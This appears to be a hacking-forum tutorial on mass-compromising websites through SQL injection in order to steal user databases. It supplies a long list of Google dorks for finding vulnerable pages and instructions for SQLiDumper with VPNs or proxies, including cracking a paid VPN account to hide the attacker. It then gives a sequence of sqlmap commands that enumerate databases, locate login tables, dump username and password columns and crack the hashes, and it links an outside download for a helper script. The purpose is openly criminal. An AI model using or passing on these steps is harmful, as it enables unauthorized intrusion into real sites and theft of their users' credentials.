1. Python 2.

7 + click +
2. SQLmap + click +
3. SQLiDumper + click +
4. VPN Accounts (Check Accounts
Section) [Hide My Ass works best)

5* . RDP / VPS
* not needed but helpfull

_________________________________
_________________________________
________________________

Let's get started:

1. Create a new Folder called "DB
Hacking" or something along
these lines. (Why? -> Else you might
loose the overview)

2. Download and install Python

2.7.XXX.
3. Download SQLiDumper 8.3 and add
it into your folder.

Folder: DB Hacking
∟ SQLi Dumper 8.3

3. Download the newest sqlmap

version and also add it into your folder.

Folder: DB Hacking
∟ SQLi Dumper 8.3
∟ sqlmapproject-xx

3. Go get yourself some dorks.

You dont know how?
+ click +

Or just use mine (These wont give you private DBs

as other ppl can use them too)
Code:
profilefree.php?companyid=
art.php?content=
OnlineGames.asp?serieId=
show-patch.asp?uid=
dettaglio-referenza.asp?id=
coursedetail.html?id=
 event_detail.asp?ev_id=
shop-item.php?id=
buynow.aspx?posid=
donation_search.php?f_school_id=
location_detail.php?idlocation=
detalle.php?rec_id=
actividades_unidade.asp?cod_unidade=
detalle.php?palabra=
special-price.html?size=
home.php?nav=
testimonios.php?id=
navsource.html?page_id=
healthandsafety.php?Action=
categories.asp?cid=
dispnews.php?idw=
training_detail.php?id=
custom_page.asp?id=
salelisting_new.asp?desc=
shopnames.php?letter=
division.asp?Id=
ShowCat.aspx?secId=
search.asp?strsearchtype=
news-detail.php?news=
default.asp?brandcode=
show_category.aspx?ParentCategoryID=
productlist.asp?categoryname=
index.asp?k=
IND_interiorSecciones.php?s=
member-benefits.php?mod=
rubrique.php?id_rub=
wpdocumentdisplay.aspx?contentid=
photo.asp?mmum=
pagegallery.php?pgid=
taxicard_type.php?type_id=
print_list.php?id=
kwsearch.php?word=
specifications-gallery.php?gallery=
ItemDetails.aspx?ItemID=
produits.php?docid=
pool.asp?hdnContent=
calendar_details.asp?xid=
s_noticias.asp?id=
ethnobotany.php?sterm=
consulta_main.php?id_imovel=
productlist.aspx?attributetype=
get_product.php?productid=
detail_en.asp?newsid=
dormire-bere-mangiare-san-vincenzo-scheda.php?id=
spotsspecies.php?s_specie_id=
Energize.php?cate=
productss_en.asp?bigclassid=
article.php?fid=
scheda_articolo.php?id=
downloadcatsearch.asp?cat=
star-bar.php?pid=
EventListing.asp?id=
actiuni_prezentare.php?idx=
ADDetail.asp?ID=
detailproduct.php?id=
knowledge_base.php?issue=
 detail.php?id_product=
start.asp?productid=
licence.php?lang=
gru_en.php?id=
jobsearch.aspx?lang=
elook_anli.asp?id=
childrens-publisher.php?src=
movie.php?tvid=
jerseys.php?jersey_id=
departments.php?dept=
search.php?username=
cms.php?bf=
buy-detail.php?nwid=
index.asp?property_id=
VendorDetail.aspx?vid=
template_list.asp?code=
BookDesc.asp?catId=
ibm.asp?svpage=
jugar.php?id=
item_viewDesc.php?no=
ResultPage.aspx?pi=
page.asp?contentid=
article_b.asp?id=
customer_content.php?category_id=
application.asp?groupid=
eventview.php?cid=
kategori.php?kategori=
bulletin_board.asp?issue_id=
review.php?listing_id=
detalleNoticia.php?id_contenido=
default.asp?ERROR_CODE=
get_download.php?id=
rtrd.php?sfm_from_iframe=
interna.asp?Menu=
link_detail.php?linksPage=
property_list.php?county=
searchcatalog.asp?PartID=
article.htm?id=
ProductDetails.php?brand_id=
severdig_pub.php?Id=
comunicacao-visual-produtos.php?categ=
numerology_how_it_works.php?page=
reader.php?objid=
perfiles.php?id=
chama_centro_paginas.php?pg=
index.asp?configurar=
hot_jobs.asp?artID=
Discoveryontarget_Sponsor.aspx?id=
noticias.asp?lingua=
pettravelguide.php?pg=
show.php?kat=
greeting.aspx?format=
pp.php?id=
stilius.php?id=
history.asp?pageguid=
[size=undefined]
 4. Open SQLi Dumper 8.3 and paste
your Dorks

(You can now choose between

using HMA 2.8.24.0 or proxies)
How to use HMA:

1. Buy / Crack a premium Acc.

2. Download HMA 2.8.24.0
3. Put in you login Deatails and connect fot the first
time

Then reconnect your VPN and click

Start Scanner > URLS only in SQLi
Dumper

How to use Proxies:

Go to www.socks24.org and download

the newest proxy-list.
In SQLiDumper go to Tools & Settings -
 > Proxy
And paste all your downloaded proxies
into the SOCKS5 4 column and Test
them

It will take about 20 mins to check them

all.
...wait untill all are checked...
Click ok.
Now from the Dropdown choose
SOCKS5 4 Protocoll.

5. Start Checking the dorks.

This proccess will take a while and that
why I recommend using a RDP / VPS
but you can do it on your main PC too.

After a few hrs you should have around

20k URLs and now can start checking
them by canceling the Online Scanner.
So switch to the exploitables tab and
 click < Start Scanner >
Wait for them to be checked
completely.
Now go to the next Tab "Injectables"
and start this as well.
You will notice that most of the URLs
are Non-Injectable (But these are what
we are here for).

6. "Injecting the Non-Injectables" <-

lmao sounds like a movie
Go to the Non-Injectables Tab and
CTRL+A > Right click > Clipboard
Go into your sqlmap folder and create
a urls.txt
Folder: DB Hacking
∟ SQLi Dumper 8.3
∟ sqlmapproject-xx
∟ urls.txt
Paste all your Non-Inkectables in there.
Now Shift + Right Mouse
 > Open cmd/powershell here
Now for the important command:
sqlmap.py -m "urls.txt" --random-agent -f
--batch -o --tables --output-dir=OUTPUT

This command will now use the newest

injections available and print out all the
databases which are injectable.
You can always check which sites have
already been tested by taking a look
into the "OUTPUT" folder
There will be a lot of folders in the
OUTPUT directory.
As some are still Non-Injectable I wrote
a script to only keep the ones that are:

Download
https://www.file-upload.net/download-
13433178/Cleaner.py.html
Run the file and you will be left with all
folders containing a vulnerable
Database. Now go back into the
sqlmap folder and
open the cmd/powershell again.
 Choose a folder from your output dir
and open the target.txt
Copy the URL in there.
Now in your cmd type:
sqlmap.py -u "yoururl" --batch --dbs --
output-dir=OUTPUT
This will give you a list of the DBs:
Now choose a DB which sounds like it
would include the user:pass and type:
sqlmap.py -u "yoururl" --batch -D
"Database Name" --tables --output-
dir=OUTPUT
Now you have all table look for one like
"users/ registration/ login..." and type:
sqlmap.py -u "yoururl" --batch -D
"Database Name" -T "Tablename" --columns
--output-dir=OUTPUT
If you found the information you are
looking for type:
sqlmap.py -u "yoururl" --batch -D
"Database Name" -T "Tablename" -C
"Columns (example: username, pass)" --
dump --eta --threads=5 --output-
dir=OUTPUT

This will now dump the columns and

give you an ETA of when they are
 done. Sometimes the passwords are
encrypted and need to be dehased
which sqlmap does automatically. Its
really fast and easy. So have fun
getting your private databases and
show me some hits u got below.[/size]
Don't Forget to leave a Like and +Rep if
you found this helpful!
[b]